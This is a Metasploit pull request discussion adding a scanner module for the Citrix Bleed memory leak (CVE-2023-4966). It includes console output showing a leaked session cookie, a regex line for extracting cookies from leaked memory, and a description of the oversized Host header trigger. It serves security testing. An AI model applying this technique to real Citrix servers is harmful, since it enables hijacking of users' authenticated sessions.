Add module for Citrix Bleed (CVE-2023-4966)

[zeroSteiner]

This adds a module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers that can be used to leak session cookies of authenticated users.

A user needs to be logged in for the vulnerability to be usable to leak a session cookie. While testing my 13.1-48.47 target, with multiple users authenticated it appears that the session cookie that is leaked is consistently the last user that authenticated and not the session cookie of the last request that was received. For that reason, it doesn't make a lot of sense to make multiple attempts to leak cookies in a short time frame as I was originally considering (say 1 request per second over 10 seconds). If the observations are correct, this would only be beneficial and leak multiple cookies if users were login within that time period.

Example Output

msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) > show options 

Module options (auxiliary/scanner/http/citrix_bleed_cve_2023_4966):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.150  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   THREADS    20               yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) > rerun VERBOSE=true
[*] Reloading module...

[*] Checking cookie: b6e7bf2ef97ef32da90e62f5e4be00b00c3a0818745525d5f4f58455e445a4a42
[+] Cookie: NSC_AAAC=b6e7bf2ef97ef32da90e62f5e4be00b00c3a0818745525d5f4f58455e445a4a42 username: metasploit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/citrix_bleed_cve_2023_4966) >

Closes #18486

[jvoisin]

Suggested change

	res.body.scan(/([0-9a-f]{32,65})/i).each do |cookie|
	res.body.scan(/([0-9a-f]{65}|[0-9a-f]{32})/i).each do |cookie|

{32,65} means "between 32 and 65 in length". Note that the order is important in my suggestion, since the regex will try to match the first condition (length = 65), and then "length = 32", so that truncation shouldn't happen.

[zeroSteiner]

I mean to keep it at "between 32 and 65 in length". That was intentional because there were implications that different versions used different sized cookies but I wasn't clear that it's always either exactly 32 or 65 bytes in length. Ultimately, the cookie's value is tested anyways, so it's unlikely we'd yield false positives. This would just reduce the set that are tested.

[cdelafuente-r7]

Thanks @zeroSteiner for updating this. Everything looks good to me, this has been tested against live targets and confirmed the user Cookies were retrieved. I'll go ahead and land it.

[cdelafuente-r7]

Release Notes

This adds a scanner module for exploiting CVE-2023-4966 which is a memory leak in Citrix ADC servers. This vulnerability allows a remote, unauthenticated attacker to leak memory by sending a very large HTTP Host header. The leaked memory is then scanned for session cookies which can be hijacked if found.